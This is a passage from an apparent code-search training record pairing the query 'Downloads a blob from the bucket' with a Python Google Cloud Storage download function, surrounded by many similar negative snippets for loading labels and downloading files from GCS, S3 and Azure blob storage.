complete_domain.split(\".\")[-1]\n # if domain unseen add it to class indices\n if domain not in labels:\n class_index += 1\n labels[domain] = class_index\n # assign label and add it to array\n y = labels[domain]\n labels_array[pos] = y\n clusters_count[domain] += 1\n labels_data = dict()\n # labels_data['labels'] = labels # do we really need this?\n labels_data['labels'] = {int(v): k for k, v in labels.items()}\n labels_data['count'] = clusters_count\n labels_data['array'] = labels_array\n if verbose:\n print(\"Found following labels:\")\n print(labels)\n with open(labels_path, 'w', encoding='utf-8') as outfile:\n json.dump(labels_data, outfile, ensure_ascii=False, indent=4)\n return labels_path", "def get_imagenet_classnames():\r\n return np.loadtxt(open(path_data+'/ilsvrc_2012_labels.txt'), dtype=object, delimiter='\\n')", "def __detect_objects_with_given_sight_from_img_path(self, labels, path, timeout):\n # Create the goal\n goalObjDetection = ObjectDetectionGoal()\n goalObjDetection.labels = labels\n goalObjDetection.path = path\n goalObjDetection.moveHead = False\n # Outputs\n state, result = self.__detectObjects(goalObjDetection, timeout)\n return state, result", "def load_labels(label_path):\r\n\r\n with open(label_path, \"r\") as f:\r\n\r\n lines = f.readlines()\r\n \r\n label = {}\r\n index = []\r\n for i, line in enumerate(lines):\r\n sp = line.split()\r\n label[sp[0]] = [int(sp[1]),int(sp[2]),int(sp[3])]\r\n index.append([int(sp[3]),int(sp[2]),int(sp[1])])\r\n\r\n return label, index", "def read(path, label2int):\n\n labels = [] # int labels\n samples = [] # examples as strings\n\n for label_dir in os.listdir(path):\n label_dir_path = os.path.join(path, label_dir)\n\n for file in os.listdir(label_dir_path):\n file_path = os.path.join(label_dir_path, file)\n file_text = open(file_path).read().rstrip()\n int_label = label2int[label_dir.lower()]\n samples.append(file_text)\n labels.append(int_label)\n\n return samples, labels", "def _label_loader(self, prefix):\n return self._base_loader(prefix, 'labels')", "def get_label_list():\n f_name = os.path.join(FLAGS.labels_dir, FLAGS.labels_name)\n if os.path.exists(f_name):\n with open(f_name, 'rb') as f:\n try:\n label_list = [line.rstrip('\\n') for line in f]\n except:\n print(\"Could not read file:\" + f_name)\n sys.exit()\n return label_list", "def dataset_files_labels(folders, db_root):\n fl = []\n for f in folders:\n\n fo = open(db_root + '/sample labels ' + f + '.txt', 'r')\n dialect = csv.Sniffer().sniff(fo.read(1024), delimiters=\"\\t \")\n fo.seek(0)\n for x in csv.reader(fo, dialect):\n fl.append([db_root + '/' + f + '/' + x[0], x[1]])\n return fl", "def label_training_data(input_path, output_path):\r\n import shutil\r\n image_files = [file for file in os.listdir(path=input_path) if '.JPG' in file or '.jpeg' in file]\r\n \r\n for file in image_files:\r\n file_input_path = os.path.join(input_path,file)\r\n \r\n img = cv2.imread(file_input_path)\r\n \r\n file_output_path = os.path.join(output_path, classify_face(img))\r\n \r\n try:\r\n os.makedirs(file_output_path)\r\n except FileExistsError:\r\n # directory already exists\r\n pass\r\n shutil.move(file_input_path, file_output_path)", "def retrieve_labels(file, label_indices):\n\n\t# Initialize numpy matrix to store the images\n\tlabels = np.zeros((len(label_indices), 10))\n\n\twith open(file, \"rb\") as f:\n\t\t# Intialize counters\n\t\ti = 0\n\t\tlabel_number = 0\n\n\t\t# Read first byte\n\t\tbyte = f.read(1)\n\n\t\t# Find each image in the data file\n\t\tfor label_index in label_indices:\n\t\t\t# Read in bytes until you arrive at the label\n\t\t\twhile byte and (i < (label_index + 8)):\n\t\t\t\tbyte = f.read(1)\n\t\t\t\ti += 1\n\n\t\t\t# Store label value in numpy array\n\t\t\tvalue = int.from_bytes(byte, \"big\")\n\t\t\tlabels[label_number] = np.zeros(10)\n\t\t\tlabels[label_number, value] = 1\n\n\t\t\t# Increment to next label\n\t\t\tlabel_number += 1\n\n\treturn labels", "def _common_label_scope(labels: list[str]) -> str:\n if not labels:\n return ''\n for i in range(len(labels[0]) - 1, -1, -1):\n if labels[0][i] == '/' and all(s.startswith(labels[0][:i + 1]) for s in labels):\n return labels[0][:i + 1]\n return ''", "def extract_labels(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(10000)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def store_labels(model_path, labels_dict, override=False):\n for i, value in enumerate(iter_partitions(model_path)):\n partition, count = value\n print(\"Partition: {}..\".format(i))\n labels = np.zeros(count, dtype=int)\n links = model_path / \"entity_names_link_{}.json\".format(i)\n with open(links, \"rt\") as tf:\n entities_list = json.load(tf)\n for pos, value in enumerate(tqdm(entities_list)):\n labels[pos] = labels_dict[int(value)]\n # save labels vector\n # TODO: infer the CORRECT name of embeddings\n h5_path = model_path / 'embeddings_link_{}.v50.h5'.format(i)\n try:\n h5f = h5py.File(h5_path, 'a')\n h5f.create_dataset('labels', data=labels, dtype=int)\n except RuntimeError:\n print(\"Labels already stored!\")\n if override:\n print(\"Overwriting new labels..\")\n h5f = h5py.File(h5_path, 'r+')\n data = h5f['labels']\n data[...] = labels\n h5f.close()", "def extract_labels(filename, num_images):\n filepath = os.path.join(WORK_DIRECTORY, filename)\n print('Extracting', filepath)\n with open(filepath, mode='rb') as bytestream:\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_detected_features_labels(img, detected_rects, label=-1, verbose=False):\n obj_rois = []\n for rect in detected_rects:\n try:\n (x, y, w, h) = rect\n except Exception as e:\n print(f\"The following error occurred when performing object detection for the image at {img_path}:\")\n print(e)\n x = None\n if verbose:\n print(*rect, sep=\", \")\n if isinstance(x, int):\n obj_rois.append(img[y:y+h, x:x+w])\n else:\n obj_rois.append(None)\n if label > -1:\n return obj_rois, [label] * len(obj_rois)\n else:\n return obj_rois", "def loadLabeled(self):\n\n maxNumChannels = self._maxNumChannels # 4\n\n baseFilePath, ext = os.path.splitext(self.path)\n baseFilePath = baseFilePath.replace('_ch1', '')\n baseFilePath = baseFilePath.replace('_ch2', '')\n\n # load mask\n #labeledPath = dvMaskPath + '_mask.tif'\n #labeledData = tifffile.imread(labeledPath)\n\n maskFromLabelGreaterThan = 0\n\n # load labeled\n for channelIdx in range(maxNumChannels):\n channelNumber = channelIdx + 1 # for _ch1, _ch2, ...\n stackListIdx = maxNumChannels + channelIdx # for index into self._stackList\n\n chStr = '_ch' + str(channelNumber)\n labeledPath = baseFilePath + chStr + '_labeled.tif'\n maskPath = baseFilePath + chStr + '_mask.tif'\n\n # if we find _labeeled.tif, load and make a mask\n # o.w. if we find _mask.tif then load that\n if os.path.isfile(maskPath):\n print(' bStack.loadLabeled() loading _mask.tif channelNumber:', channelNumber, 'maskPath:', maskPath)\n maskData = tifffile.imread(maskPath)\n self._stackList[stackListIdx] = maskData\n elif os.path.isfile(labeledPath):\n print(' bStack.loadLabeled() loading channelNumber:', channelNumber, 'labeledPath:', labeledPath)\n labeledData = tifffile.imread(labeledPath)\n self._stackList[stackListIdx] = labeledData > maskFromLabelGreaterThan\n else:\n # did not find _mask or _labeled file\n pass\n\n # erode _mask by 1 (before skel) as skel was getting mized up with z-collisions\n #self._dvMask = bimpy.util.morphology.binary_erosion(self._dvMask, iterations=2)\n\n # bVascularTracing.loadDeepVess() uses mask to make skel", "def get_predefined_labels(self):\n raise NotImplementedError", "def get_fnames_labels(root_dir, fpath, one_hot=False, skip_header=0, delimiter=','):\n data = np.genfromtxt(fpath, dtype=str, comments=None, delimiter=delimiter, skip_header=skip_header)\n fnames = data[:, 0]\n fnames = np.asarray(fnames).astype(np.str)\n labels = data[:, 1]\n labels = np.asarray(labels).astype(np.str)\n # fnames_labels = dict(zip(img_pathes, img_labels))\n\n if one_hot:\n distinct_labels = set(labels)\n labels_name_int = dict([(b, a) for a, b in enumerate(distinct_labels)])\n\n labels_ = [labels_name_int[label] for label in labels]\n else:\n labels_ = labels\n labels_ = np.asarray(labels_).astype(np.int32)\n\n fnames_ = [os.path.join(root_dir, fname) for fname in fnames]\n fnames_ = np.asarray(fnames_).astype(np.str)\n\n # shuffle\n shuffle_indices = np.random.permutation(np.arange(len(fnames_)))\n fnames_ = fnames_[shuffle_indices]\n labels_ = labels_[shuffle_indices]\n\n print('len(fnames_): {}'.format(len(fnames_)))\n print('fnames_: {}'.format(fnames_[:2]))\n print('len(labels_): {}'.format(len(labels_)))\n print('labels_: {}'.format(labels_[:2]))\n\n return fnames_, labels_" ]
[ "0.75087816", "0.7491403", "0.7457117", "0.61335844", "0.6064078", "0.5983722", "0.58968204", "0.588334", "0.5836181", "0.58187306", "0.57689315", "0.57617164", "0.5745488", "0.5734802", "0.57158095", "0.5700895", "0.5700895", "0.5694585", "0.5681159", "0.5674216", "0.5672181", "0.5670955", "0.56547266", "0.5645852", "0.5645185", "0.5627844", "0.5605539", "0.5584917", "0.5563935", "0.55612254", "0.5560586", "0.5551291", "0.55314875", "0.5519803", "0.5501721", "0.5495654", "0.5487599", "0.5479452", "0.5478808", "0.544882", "0.54155535", "0.5411252", "0.54032046", "0.5383683", "0.5376828", "0.5376815", "0.53603804", "0.53603804", "0.5342561", "0.53366244", "0.5326256", "0.529444", "0.5246211", "0.5246146", "0.5242462", "0.52396864", "0.52243406", "0.5216948", "0.52068585", "0.5204655", "0.51940054", "0.51846254", "0.51721567", "0.51721567", "0.51583874", "0.51567787", "0.51408815", "0.5117793", "0.5115234", "0.5111146", "0.5107029", "0.5083099", "0.50670904", "0.5053478", "0.50481164", "0.5044185", "0.5035731", "0.50339967", "0.50305456", "0.5027591", "0.5025618", "0.50143623", "0.5014", "0.50080043", "0.5003119", "0.49983984", "0.49933285", "0.49891222", "0.49831602", "0.49769405", "0.4975253", "0.49693912", "0.4961359", "0.4959436", "0.49573514", "0.49558797", "0.49514002", "0.49462858", "0.49367687", "0.49335253", "0.49302417" ]
0.0
-1
Downloads a blob from the bucket.
def download_blob(bucket_name, source_blob_name, destination_file_name): storage_client = storage.Client() try: bucket = storage_client.get_bucket(bucket_name) blob = bucket.blob(source_blob_name) blob.download_to_filename(destination_file_name) print('Blob {} downloaded to {}.'.format( source_blob_name, destination_file_name)) except: print("User does not have access to that bucket. Trying public link:") gcs_url = 'https://%(bucket)s.storage.googleapis.com/%(file)s' % {'bucket':bucket_name, 'file':source_blob_name} urllib.urlretrieve(gcs_url, destination_file_name) print ("Download complete")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def download_blob(bucket_name, source_blob_name):\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n return blob", "def blob_download(blob_url):\n blob = storage.Object.from_url(blob_url)\n blobc = blob.download()\n return blobc", "def download_blob(bucket_name, source_blob_name):\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n return blob.download_as_string().decode()", "def download_blob(url: str) -> io.BytesIO:\n storage_client = storage.Client()\n bucket_name = get_bucket_name(url)\n source_blob_name = get_blob_name(url)\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n f = io.BytesIO(blob.download_as_bytes())\n return f", "def download_bucket(blob_name, path_to_file):\r\n blob = bucket.blob(blob_name)\r\n blob.download_to_filename(path_to_file)", "def download_specific_blob(bucket_name, path_to_storage_file_name, download_file_name):\r\n\r\n try:\r\n # initialize client & get blob\r\n _, _, blob = create_client(bucket_name, path_to_storage_file_name)\r\n\r\n # set the path to source file\r\n blob.download_to_filename(download_file_name)\r\n \r\n except Exception as err:\r\n raise err\r\n sys.exit(1)\r\n \r\n else:\r\n print(f\"download blob '{path_to_storage_file_name}' succeed\")\r\n\r\n return None", "def get_blob(self, download_meta):\n bucket_name, key = self._get_bucket_key(download_meta)\n response = self.s3.get_object(Bucket=bucket_name,\n Key=key)\n return response['Body'].read().decode()", "def downloadBlob(self, oid, serial):\n\n key = s3_blob_filename(oid, serial)\n\n # Confirm blob cache directory is locked for writes\n cache_filename = self.fshelper.getBlobFilename(oid, serial)\n lock_filename = os.path.join(os.path.dirname(cache_filename), '.lock')\n assert os.path.exists(lock_filename)\n\n # Download\n self.bucket.download_file(key, cache_filename)\n os.chmod(cache_filename, stat.S_IREAD)\n\n # Cache bookkeeping\n self._blob_data_bytes_loaded += os.path.getsize(cache_filename)\n self._check_blob_size(self._blob_data_bytes_loaded)", "def download_blob(bucket_name, source_blob_name, destination_file_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)\n\n print('Blob {} downloaded to {}.'.format(\n source_blob_name,\n destination_file_name))", "def get_blob(self, blob_name):\n return self.bucket.get_blob(blob_name)", "def download(self, bucket, object, filename=None):\n service = self.get_conn()\n downloaded_file_bytes = service \\\n .objects() \\\n .get_media(bucket=bucket, object=object) \\\n .execute()\n\n # Write the file to local file path, if requested.\n if filename:\n write_argument = 'wb' if isinstance(downloaded_file_bytes, bytes) else 'w'\n with open(filename, write_argument) as file_fd:\n file_fd.write(downloaded_file_bytes)\n\n return downloaded_file_bytes", "def download_blob(bucket_name, source_blob_name, destination_file_name):\n # bucket_name = \"your-bucket-name\"\n # source_blob_name = \"storage-object-name\"\n # destination_file_name = \"local/path/to/file\"\n\n bucket = storage_client.bucket(bucket_name)\n blobs = storage_client.list_blobs(bucket_name)\n for blob in blobs:\n print(blob.name)\n if (blob.name == source_blob_name):\n # Construct a client side representation of a blob.\n # Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve\n # any content from Google Cloud Storage. As we don't need additional data,\n # using `Bucket.blob` is preferred here.\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n \n print(\n \"Blob {} downloaded to {}.\".format(\n source_blob_name, destination_file_name\n )\n )", "def download_blob(bucket_name, source_blob_name, destination_file_name):\n # The ID of your GCS bucket\n # bucket_name = \"your-bucket-name\"\n\n # The ID of your GCS object\n # source_blob_name = \"storage-object-name\"\n\n # The path to which the file should be downloaded\n # destination_file_name = \"local/path/to/file\"\n\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n\n # Construct a client side representation of a blob.\n # Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve\n # any content from Google Cloud Storage. As we don't need additional data,\n # using `Bucket.blob` is preferred here.\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n\n print(\n \"Downloaded storage object {} from bucket {} to local file {}.\".format(\n source_blob_name, bucket_name, destination_file_name))", "def download_blob(source_blob_name, destination_file_name, bucket_name=\"bts-ml-data\"):\n # bucket_name = \"your-bucket-name\"\n # source_blob_name = \"storage-object-name\"\n # destination_file_name = \"local/path/to/file\"\n\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)\n\n print(\n \"Blob {} downloaded to {}.\".format(\n source_blob_name, destination_file_name\n )\n )", "def run(\n self,\n bucket: str = None,\n blob: str = None,\n project: str = None,\n chunk_size: int = None,\n credentials: dict = None,\n encryption_key: str = None,\n request_timeout: Union[float, Tuple[float, float]] = 60,\n ) -> str:\n # create client\n client = get_storage_client(project=project, credentials=credentials)\n\n # retrieve bucket\n bucket = self._retrieve_bucket(\n client=client, bucket=bucket, create_bucket=False\n )\n\n # identify blob name\n blob = self._get_blob(\n bucket,\n blob,\n chunk_size=chunk_size,\n encryption_key=encryption_key,\n )\n # Support GCS < 1.31\n return (\n blob.download_as_bytes(timeout=request_timeout)\n if hasattr(blob, \"download_as_bytes\")\n else blob.download_as_string(timeout=request_timeout)\n )", "def gcs_download_blob(bucket_name, source_blob_name, destination_file_name):\n storage_client = client #storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)", "def download(bucket, key):\n validate_bucket_name(bucket)\n validate_key_name(key)\n client = get_client()\n\n # do a buffered download\n bytes_io = io.BytesIO()\n client.download_fileobj(bucket, key, bytes_io)\n\n # hope that stuff is not too big, and just return content\n return bytes_io.getvalue()", "def get_blob(self, download_meta):\n blob_id = download_meta['blob_id']\n if isinstance(blob_id, str):\n blob_id = uuid.UUID(blob_id)\n session = self.DBSession()\n blob = session.get(Blob, blob_id) # was session.query(Blob).get(blob_id), rewritten for SA2.0\n return blob.data", "def _retrieve_blob(self, object_key):\n return self.s3_resource.Object(self.CVE_BUCKET, object_key).get()['Body'].read()", "def download(self, bucket_name, file_name, file_path):\n\n self.client.download_file(bucket_name, file_name, file_path)", "def loadS3Blob(self, oid, serial):\n\n # Check if it's already in the cache\n cache_filename = self.fshelper.getBlobFilename(oid, serial)\n if os.path.exists(cache_filename):\n return ZEO.ClientStorage._accessed(cache_filename)\n\n # If not, download from S3...\n # First, we'll create the directory for this oid, if it doesn't exist.\n self.fshelper.createPathForOID(oid)\n\n # OK, it's not here and we (or someone) needs to get it. We\n # want to avoid getting it multiple times. We want to avoid\n # getting it multiple times even accross separate client\n # processes on the same machine. We'll use file locking.\n\n lock = ZEO.ClientStorage._lock_blob(cache_filename)\n try:\n # We got the lock, so it's our job to download it. First,\n # we'll double check that someone didn't download it while we\n # were getting the lock:\n\n if os.path.exists(cache_filename):\n return ZEO.ClientStorage._accessed(cache_filename)\n\n # Actually download the blob. When this function\n # returns, it will have been sent. (The receiving will\n # have been handled by the asyncore thread.)\n self.downloadBlob(oid, serial)\n\n if os.path.exists(cache_filename):\n return ZEO.ClientStorage._accessed(cache_filename)\n\n raise ZODB.POSException.POSKeyError(\"No blob file\", oid, serial)\n finally:\n lock.close()", "def download_file(self, bucket_name, object_name, file_name):\n self._client.download_file(bucket_name, object_name, file_name)", "def download_blob(blob, file_group, destination, blob_service, progress_callback):\n\n def _wrap_callback(curr, total):\n if progress_callback:\n progress_callback(curr, total, destination)\n\n blob_service.get_blob_to_path(\n get_container_name(file_group), blob, destination,\n progress_callback=_wrap_callback)", "def __retrieve_from_bucket(fname):\n blob = BUCKET.blob(fname)\n json_data = json.loads(blob.download_as_string())\n return json_data", "def urlgrab(self, url, filename=None, **kwargs):\n blob_location = \"%s/%s\" % (self.base_path, url)\n self.verbose_logger.info(\"downloading gs://%s/%s to %s\" % (self.bucket.name, blob_location, filename))\n url = url.lstrip('/')\n if not filename:\n filename = url\n\n blob = storage.blob.Blob(name=blob_location,bucket = self.bucket)\n blob.download_to_filename(filename)\n return filename", "def get_raw(key: str, bucket: google.cloud.storage.bucket.Bucket) -> bytes:\n blob = google.cloud.storage.blob.Blob(name=key, bucket=bucket)\n return blob.download_as_string()", "def get_blob_url(self, download_meta):\n bucket_name, key = self._get_bucket_key(download_meta)\n location = self.s3.generate_presigned_url(\n ClientMethod='get_object',\n ExpiresIn=36*60*60,\n Params={'Bucket': bucket_name, 'Key': key})\n return location", "def _download_from_bucket(self, ext_filename, local_filename, force=False):\n if os.path.exists(local_filename) and not force:\n logging.info('File {} already exists. Not overwriting...'.format(local_filename))\n return\n if os.path.exists(local_filename) and force:\n logging.info('File {} already exists. Overwriting...'.format(local_filename))\n else:\n logging.info('File {} does not exist. Downloading...'.format(local_filename))\n\n Path(os.path.dirname(local_filename)).mkdir(parents=True, exist_ok=True)\n\n if self.s3:\n self.bucket.download_file(ext_filename, local_filename)\n logging.info('Downloaded {} to {}'.format(ext_filename, local_filename))\n if self.gs:\n try:\n client = storage.Client()\n bucket = client.get_bucket(self.bucket_name)\n blob = storage.Blob(ext_filename, bucket)\n blob.download_to_filename(local_filename)\n logging.info('Downloaded {} to {}'.format(ext_filename, local_filename))\n except:\n logging.warning('Downloading failed')\n\n i += 1", "def download_file(bucket_name: str, object_name: str, file_path: str):\n # pylint: disable=import-outside-toplevel\n from sotaque_brasileiro.utils import safe_getenv\n\n minio_client = Minio(\n safe_getenv(constants.MINIO_ENDPOINT.value),\n access_key=safe_getenv(constants.MINIO_ACCESS_KEY.value),\n secret_key=safe_getenv(constants.MINIO_SECRET_KEY.value),\n )\n minio_client.fget_object(bucket_name, object_name, file_path)", "def delete_blob(bucket_name, blob_name):\r\n\r\n # initialize client, get bucket, & get blob\r\n _, _, blob = create_client(bucket_name, blob_name)\r\n\r\n # delete blob\r\n blob.delete()\r\n\r\n print(\"blob {} deleted\".format(blob_name))", "def download_file(bucket, key, filename):\n validate_bucket_name(bucket)\n validate_key_name(key)\n client = get_client()\n\n client.download_file(bucket, key, filename)", "def get_image(filename):\n\n client.download_file(S3_BUCKET, filename, 'uploads/{}'.format(filename))", "def download_file(Bucket=None, Key=None, Filename=None, ExtraArgs=None, Callback=None, Config=None):\n pass", "def get(self, bucket: str, object_name: str) -> bytes:\n raise NotImplementedError()", "def OpenBlob(self, blob_key):\n return StringIO.StringIO(\n self._blobs[blobstore.BlobKey(unicode(blob_key))])", "def download_object(self, bucket, key, dest_path) -> None:\n self.resource.Bucket(bucket).download_file(key, dest_path)", "def get_file(self, file_name: str) -> BytesIO:\n fl = BytesIO()\n self.client.download_fileobj(self.bucket, file_name, fl)\n fl.seek(0)\n return fl", "def download_file(bucket,file_name):\n with open(file_name, 'wb') as f:\n s3.download_fileobj(bucket, file_name,f)\n print(file_name, \": is downloaded\")", "def fetch_and_extract(self, filename):\n # type: (Text) -> None\n\n blob = self.bucket.blob(filename)\n blob.download_to_filename(filename)\n\n with tarfile.open(filename, \"r:gz\") as tar:\n tar.extractall(self.data_dir)", "def download_from_blob():\n block_blob_service = BlockBlobService(account_name='project3twitter',\n account_key='<YOUR_ACCOUNT_KEY>')\n container_name = 'project3'\n block_blob_service.set_container_acl(container_name, public_access=PublicAccess.Container)\n\n # actual download\n block_blob_service.get_blob_to_path(container_name, 'word-count.txt', 'resource/word-count.txt')", "def delete_blob(bucket_name, blob_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(blob_name)\n\n blob.delete()\n\n print('Blob {} deleted.'.format(blob_name))", "def download_file_from_s3_public_bucket(bucket, object, output_file):\n botocore_config = Config(signature_version=UNSIGNED)\n s3_client = boto3.client(\"s3\", config=botocore_config)\n s3_client.download_file(bucket, object, output_file)", "def _download_file(bucket: str, key: str) -> str:\n tmp_file_name = f\"/tmp/logs\"\n\n try:\n with open(tmp_file_name, \"wb\") as data:\n s3cl.download_fileobj(bucket, key, data)\n except Exception as e:\n print(type(e).__name__, e)\n f = open(tmp_file_name, \"w\")\n f.write(\"\")\n f.close()\n try:\n with gzip.open(tmp_file_name, mode=\"rt\") as f:\n x = f.read()\n return x\n except Exception as e:\n print(type(e).__name__, e, key)\n return \"\"", "def loadBlob(self, oid, serial):\n start = time.time()\n try:\n blob_filename = self.storage.loadBlob(oid, serial)\n logger.debug('Fetched blob from ZEO in %ss' % (time.time() - start))\n except ZODB.POSException.POSKeyError:\n blob_filename = self.loadS3Blob(oid, serial)\n logger.debug('Fetched blob from S3 in %ss' % (time.time() - start))\n return blob_filename", "def s3_download(path):\n with s3_read(path):\n # Reading the file will cache the file locally.\n pass", "def download(self, bucket_name=None,\n object_key=None,\n dest=None):\n\n if bucket_name == None or \\\n object_key == None or \\\n dest == None:\n u_print(\" Error - argument is missing\")\n\n u_print_d('S3.download() - bucket=[{}] key=[{}] dest=[{}]'.format(bucket_name,\n object_key,\n dest))\n return self.s3.Object(bucket_name, object_key).download_file(dest)", "def get_bytes(bucket: str, key: str) -> bytes:\n logger.debug(f'Reading from s3://{bucket}/{key}')\n response = client().get_object(Bucket=bucket, Key=key)\n return response['Body'].read()", "def s3_get(url, temp_file):\n s3_resource = boto3.resource(\"s3\")\n bucket_name, s3_path = split_s3_path(url)\n s3_resource.Bucket(bucket_name).download_fileobj(s3_path, temp_file)", "def s3_get(url, temp_file):\n s3_resource = boto3.resource(\"s3\")\n bucket_name, s3_path = split_s3_path(url)\n s3_resource.Bucket(bucket_name).download_fileobj(s3_path, temp_file)", "async def fetch_file(self, download_url: str) -> bytes:\n log.debug(f\"Fetching file from branding repository: '{download_url}'.\")\n\n async with self.bot.http_session.get(download_url, params=PARAMS, headers=HEADERS) as response:\n if response.status != 200:\n raise RuntimeError(f\"Failed to fetch file due to status: {response.status}\")\n\n log.debug(\"Fetch successful, reading payload.\")\n return await response.read()", "def download(self, file_url):\n url = self.base_url + \"/storage-service/cloud-storage/s3/file/download?url={0}\".format(file_url)\n\n headers = {\"ApiKey\": self.api_key}\n response = requests.get(url=url, headers=headers)\n return response", "def get_blob(uuid, path=''):\n check_bundles_have_read_permission(local.model, request.user, [uuid])\n bundle = local.model.get_bundle(uuid)\n\n target_info = local.download_manager.get_target_info(uuid, path, 0)\n if target_info is None:\n abort(httplib.NOT_FOUND, 'Not found.')\n\n # Figure out the file name.\n if not path and bundle.metadata.name:\n filename = bundle.metadata.name\n else:\n filename = target_info['name']\n\n if target_info['type'] == 'directory':\n # Always tar and gzip directories.\n filename = filename + '.tar.gz'\n fileobj = local.download_manager.stream_tarred_gzipped_directory(uuid, path)\n elif target_info['type'] == 'file':\n if not zip_util.path_is_archive(filename) and request_accepts_gzip_encoding():\n # Let's gzip to save bandwidth. The browser will transparently decode\n # the file.\n filename = filename + '.gz'\n fileobj = local.download_manager.stream_file(uuid, path, gzipped=True)\n else:\n fileobj = local.download_manager.stream_file(uuid, path, gzipped=False)\n else:\n # Symlinks.\n abort(httplib.FORBIDDEN, 'Cannot download files of this type.')\n \n # Set headers.\n mimetype, _ = mimetypes.guess_type(filename, strict=False)\n response.set_header('Content-Type', mimetype or 'text/plain')\n if zip_util.get_archive_ext(filename) == '.gz' and request_accepts_gzip_encoding():\n filename = zip_util.strip_archive_ext(filename)\n response.set_header('Content-Encoding', 'gzip')\n else:\n response.set_header('Content-Encoding', 'identity')\n response.set_header('Content-Disposition', 'filename=\"%s\"' % filename)\n\n return fileobj", "def get_s3_object(bucket, key_name, local_file):\n\n tracer.put_metadata('object', f's3://{bucket}/{key_name}')\n\n try:\n s3_resource.Bucket(bucket).download_file(key_name, local_file)\n result = 'ok'\n tracer.put_annotation('OBJECT_DOWNLOAD', 'SUCCESS')\n except botocore.exceptions.ClientError as e:\n tracer.put_annotation('OBJECT_DOWNLOAD', 'FAILURE')\n if e.response['Error']['Code'] == '404':\n result = f'Error: s3://{bucket}/{key_name} does not exist'\n else:\n result = f'Error: {str(e)}'\n\n return(result)", "def _progress_blob(self, bucket, blob_name, progress_callback):\n return _ProgressBlob(\n name=blob_name,\n bucket=bucket,\n progress_callback=progress_callback\n )", "def download_from_s3(s3_resource, photo):\n try:\n bucket, key = photo.replace(\"s3://\", \"\").split(\"/\", 1)\n local_file = os.path.basename(photo)\n except ValueError as err:\n logger.exception(\"Couldn't get S3 info for %s: %s\", photo)\n raise\n\n try:\n logger.info(\"Downloading %s\", photo)\n s3_resource.Bucket(bucket).download_file(key, local_file)\n except ClientError:\n logger.exception(\"Couldn't download %s from S3.\", photo)\n raise\n\n return local_file", "def downloadObject(bucket:str, object:str, region:str, path:Path) -> None:\n client = boto3.client('s3', region_name=region)\n try:\n with open(str(path), 'wb') as data:\n client.download_fileobj(Bucket=bucket, Object=object, Data=data)\n except Exception as e:\n raise ObjectDownloadError(e)", "def DownloadFile(self, gcs_file_name, io_base):\n bucket, bucket_path = self._ParseBucketAndPath(gcs_file_name)\n\n # Check the size of the remote file. If it's empty, we have to return early\n # because the chunked downloader will crash. There aren't any contents to\n # retrieve in that case, anyway.\n object_data = self._RunWithRetries(\n self._service.objects().get(bucket=bucket, object=bucket_path).execute,\n self._CommonErrorMatcher)\n if ('name' not in object_data or object_data['name'] != bucket_path\n or 'size' not in object_data):\n raise CloudStorageApiError('Object data for %s is malformed.' %\n GcsPath(bucket, bucket_path))\n if int(object_data['size']) == 0:\n return\n\n request = self._service.objects().get_media(bucket=bucket,\n object=bucket_path)\n downloader = gapi_http.MediaIoBaseDownload(\n io_base, request, chunksize=1024*1024)\n done = False\n while not done:\n # The first return value indicates download progress, which we won't do\n # anything fancy with for now.\n _, done = self._RunWithRetries(downloader.next_chunk,\n self._CommonErrorMatcher)", "def generate_download_signed_url_v4(bucket_name, blob_name):\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(blob_name)\n\n url = blob.generate_signed_url(\n version=\"v4\",\n # This URL is valid for 15 minutes\n expiration=datetime.timedelta(minutes=30),\n # Allow GET requests using this URL.\n method=\"GET\",\n )\n\n return url", "def download_from_gcs(gcs_uri, target_path):\n bucket, blob_name = gcs_uri.replace('gs://', '').split('/', 1)\n client = storage.Client(project='embdatalab')\n bucket = client.get_bucket(bucket)\n prefix = blob_name.split('*')[0]\n unzipped = open(target_path, 'w')\n cmd = \"gunzip -c -f %s >> %s\"\n for blob in bucket.list_blobs(prefix=prefix):\n with tempfile.NamedTemporaryFile(mode='rb+') as f:\n logger.info(\"Downloading %s to %s\" % (blob.path, f.name))\n blob.chunk_size = 2 ** 30\n blob.download_to_file(f)\n f.flush()\n f.seek(0)\n subprocess.check_call(\n cmd % (f.name, unzipped.name), shell=True)\n return unzipped.name", "def download_file(cls, uri, fobj):\n # Breaks the URI into usable componenents.\n values = get_values_from_media_uri(uri)\n\n conn = cls._get_aws_s3_connection(values['username'],\n values['password'])\n bucket = conn.get_bucket(values['host'])\n key = bucket.get_key(values['path'])\n\n logger.debug(\"S3Backend.download_file(): \" \\\n \"Downloading: %s\" % uri)\n\n try:\n key.get_contents_to_file(fobj)\n except AttributeError:\n # Raised by ResumableDownloadHandler in boto when the given S3\n # key can't be found.\n message = \"The specified input file cannot be found.\"\n raise InfileNotFoundException(message)\n\n logger.debug(\"S3Backend.download_file(): \" \\\n \"Download of %s completed.\" % uri)\n return fobj", "def get_s3_object(self, remote_s3_url):\n try:\n _file = tempfile.mkstemp()[1]\n parsed_s3_path = remote_s3_url.split(\"/\", 3) # s3://bucket-name/key\n remote_bucket = 